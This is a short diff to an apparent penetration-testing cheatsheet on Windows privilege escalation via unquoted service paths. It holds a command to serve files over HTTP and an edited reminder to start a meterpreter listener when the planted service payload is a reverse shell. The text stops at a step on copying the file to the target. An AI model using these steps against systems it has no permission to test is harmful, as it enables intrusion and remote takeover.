notCyloth/Cheatsheet/3 - Privilege Escalation/Windows/Unquoted Service Paths.md

 ```bash
 python -m http.server 80
 ```
-Remember to set up a listener if the service payload is a revshell!
+Remember to set up a listener (multi/handler for meterpreter) if the service payload is a revshell!

 Transfer file to target machine at the vulnerable service path:
 ```powershell